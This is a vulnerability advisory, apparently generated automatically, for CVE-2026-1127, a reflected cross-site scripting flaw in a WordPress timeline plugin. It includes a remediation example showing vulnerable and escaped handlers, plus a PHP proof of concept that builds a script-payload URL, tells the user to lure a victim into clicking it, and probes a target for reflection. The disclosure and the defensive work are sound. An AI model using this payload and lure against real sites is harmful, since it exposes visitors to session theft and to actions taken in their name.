Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1127: Timeline Event History <= 3.2 – Reflected Cross-Site Scripting (timeline-event-history)

CVE ID: CVE-2026-1127
Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 3.2
Patched Version: (not listed)
Disclosed: January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1127 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the WordPress Timeline Event History plugin, affecting all versions up to and including 3.2. The vulnerability originates from insufficient sanitization and escaping of the `id` parameter. An unauthenticated attacker can exploit this to inject arbitrary JavaScript, which executes in the victim’s browser context when they visit a specially crafted link. The CVSS score of 6.1 (Medium) reflects the attack’s network-based nature, low complexity, and requirement for user interaction, with scope changes to the victim’s browser session.

Atomic Edge research identifies the root cause as CWE-79, Improper Neutralization of Input During Web Page Generation. The vulnerability description explicitly cites insufficient input sanitization and output escaping on the `id` parameter. Without access to the patched code, Atomic Edge analysis infers the vulnerable code likely echoes the unsanitized `id` GET or POST parameter directly into the server’s HTML response. This is a common pattern in WordPress plugins where user input is not passed through functions like `esc_attr()` or `esc_html()` before being rendered.

Exploitation requires an attacker to trick a user into clicking a link containing a malicious JavaScript payload within the `id` parameter. The exact endpoint is not specified in the metadata. However, based on WordPress plugin conventions and the public nature of the parameter, Atomic Edge research assesses the attack vector is likely a public-facing page or shortcode handler provided by the plugin. A realistic attack URL would be `https://target.site/?id=payload` or `https://target.site/page-with-plugin-shortcode/?id=payload`. The payload would be a standard XSS vector like `alert(document.domain)` or a more stealthy variant using event handlers.

Remediation requires implementing proper output escaping or context-appropriate sanitization. The fix should ensure all instances where the `id` parameter is output are wrapped in WordPress escaping functions. For HTML attribute contexts, `esc_attr()` is required. For HTML body contexts, `esc_html()` is necessary. Input validation, such as ensuring the `id` is an integer, could provide a secondary layer of defense, but output escaping is the primary and mandatory corrective action for this CWE.
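The vulnerable pattern described above and the remediation it calls for, side by side, as an added example (this is not the plugin's code; the shortcode-style handler, its markup and the request array are hypothetical, and the WordPress helpers `esc_html()`, `esc_attr()` and `absint()` are replaced by minimal stand-ins so the file runs under plain `php` on the command line; inside WordPress the real functions take over):

```php
<?php
// Added example, not taken from the Timeline Event History plugin.
// Shows an `id` parameter reflected unescaped (the CWE-79 pattern) next to a
// handler that validates the value and escapes it per HTML context.
declare(strict_types=1);

if (!function_exists('esc_html')) {
    // Stand-in for WordPress esc_html(): escape for HTML body text.
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    // Stand-in for WordPress esc_attr(): escape for a quoted attribute value.
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    // Stand-in for WordPress absint(): non-negative integer from arbitrary input.
    function absint($maybeint): int {
        return abs((int) $maybeint);
    }
}

// VULNERABLE: the raw request value is concatenated into the response in an
// attribute context and in a body-text context, with no escaping at all.
function timeline_vulnerable(array $request): string {
    $id = $request['id'] ?? '';
    return '<div class="timeline" data-id="' . $id . '">'
         . '<h2>Timeline #' . $id . '</h2></div>';
}

// HARDENED: output escaping matched to each context is the primary fix;
// coercing the id to an integer is the secondary, defense-in-depth layer.
function timeline_hardened(array $request): string {
    $id = absint($request['id'] ?? 0);
    if ($id === 0) {
        return '<div class="timeline">' . esc_html('No timeline selected.') . '</div>';
    }
    // $id is already an int; the escaping calls stay so the code remains
    // correct if the accepted type of the parameter is ever widened.
    return '<div class="timeline" data-id="' . esc_attr((string) $id) . '">'
         . '<h2>Timeline #' . esc_html((string) $id) . '</h2></div>';
}

// Constructed sample requests standing in for $_GET: a normal id, and a value
// carrying the kind of markup the analysis describes.
$samples = [
    'benign' => ['id' => '42'],
    'markup' => ['id' => '"><script>alert(document.domain)</script>'],
];

foreach ($samples as $label => $request) {
    echo "== $label ==\n";
    echo "vulnerable:    " . timeline_vulnerable($request) . "\n";
    echo "escaped only:  " . esc_html($request['id']) . "\n";
    echo "hardened:      " . timeline_hardened($request) . "\n";
    // Does a raw <script tag survive into the vulnerable response?
    $reflected = strpos(timeline_vulnerable($request), '<script') !== false;
    echo "raw tag reflected by vulnerable handler: " . ($reflected ? 'yes' : 'no') . "\n\n";
}
```

Run it with `php example.php`. For the `markup` sample the vulnerable handler emits the tag verbatim, the escaping-only line shows the same value neutralised (`&quot;&gt;&lt;script&gt;...`), and the hardened handler never reaches the reflected value because `absint()` reduces it to 0. Escaping is what closes the CWE-79 finding; the integer check only narrows what can reach the escaping call.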

Successful exploitation leads to limited confidentiality and integrity impacts within the victim’s browser session. The injected script executes with the privileges of the current page, allowing an attacker to steal session cookies, perform actions on behalf of the user, or deface the website. The impact is constrained to the user who clicks the malicious link and does not permit direct privilege escalation or remote code execution on the server.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1127 - Timeline Event History <= 3.2 - Reflected Cross-Site Scripting
/**
 * Proof of Concept for CVE-2026-1127.
 * This script generates a malicious link targeting the vulnerable 'id' parameter.
 * The exact endpoint is unknown; this PoC assumes the parameter is accepted on a public page.
 * User interaction (clicking the link) is required for exploitation.
 */

$target_url = 'https://victim-site.com/'; // CHANGE THIS to the target WordPress site URL.

// A basic XSS payload to demonstrate proof-of-concept.
// In a real attack, this would be obfuscated and could steal cookies or perform actions.
$xss_payload = rawurlencode('<script>alert("XSS via CVE-2026-1127: "+document.domain)</script>');

// Construct the malicious URL.
// Assumption: The 'id' parameter is processed on a page rendered by the plugin.
// This could be a dedicated plugin page or a page containing the plugin's shortcode.
$exploit_url = $target_url . '?id=' . $xss_payload;

// Alternative: Target a specific page/post if the plugin uses a shortcode.
// $exploit_url = $target_url . '/some-page/?id=' . $xss_payload;

echo "Atomic Edge CVE-2026-1127 Proof of Concept\n";
echo "==========================================\n";
echo "Target: $target_url\n";
echo "Generated Exploit URL:\n";
echo $exploit_url . "\n\n";
echo "Instructions: Lure a victim user to click the above link.\n";
echo "The JavaScript alert will execute in their browser if the site is vulnerable.\n";

// Optional: Use cURL to perform a test request and check for unsanitized reflection.
// This only confirms parameter reflection, not successful script execution.
echo "\n[+] Performing basic reflection test...\n";
$ch = curl_init();
$test_payload = rawurlencode('TEST_ID_PARAM');
$test_url = $target_url . '?id=' . $test_payload;
curl_setopt($ch, CURLOPT_URL, $test_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$curl_error = curl_error($ch); // Read before curl_close(), which discards it.
curl_close($ch);

if ($response === false) {
    echo "  -> Request failed: $curl_error\n";
} elseif (strpos($response, 'TEST_ID_PARAM') !== false) {
    echo "  -> The 'id' parameter value is reflected in the response (HTTP $http_code).\n";
    echo "  -> Site may be vulnerable. Manual verification with script payload required.\n";
} else {
    echo "  -> No clear reflection of the test parameter found (HTTP $http_code).\n";
    echo "  -> The vulnerable endpoint may be different.\n";
}
?>
